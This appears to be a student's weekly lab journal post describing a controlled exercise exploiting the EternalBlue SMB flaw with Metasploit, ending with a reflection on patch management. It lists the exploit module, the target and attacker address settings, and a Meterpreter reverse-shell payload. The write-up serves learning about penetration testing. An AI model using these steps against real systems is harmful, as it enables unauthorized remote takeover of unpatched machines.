Week 7
Week 7 marked a shift from theory to hands-on practice. In a controlled lab environment, we simulated a real-world cyberattack by exploiting the EternalBlue vulnerability (CVE-2017-0144) using the Metasploit Framework (msfconsole).
Lab Setup
We launched Metasploit using the msfconsole
command and loaded the EternalBlue exploit module:
use exploit/windows/smb/ms17_010_eternalblue
We configured the required parameters:
-
RHOSTS
— the target machine’s IP -
LHOST
— our own attacker machine’s IP
To confirm the target was vulnerable, we scanned it using Nmap and verified that SMB (port 445) was open.
The default payload used was:
set PAYLOAD windows/x64/meterpreter/reverse_tcp
This payload would establish a reverse shell, giving us remote access to the target system if the exploit was successful.
Finally, we executed the attack with the exploit
command. On success, we demonstrated control by creating a file with our name on the victim machine — proof of successful exploitation.
Reflection
This was a very enagging and interesting session as it offered a real glimpse into how penetration testing works in practice and highlighted how a single unpatched vulnerability can lead to full system compromise. It emphasized the importance of timely updates and patch management in cybersecurity.
Comments
Post a Comment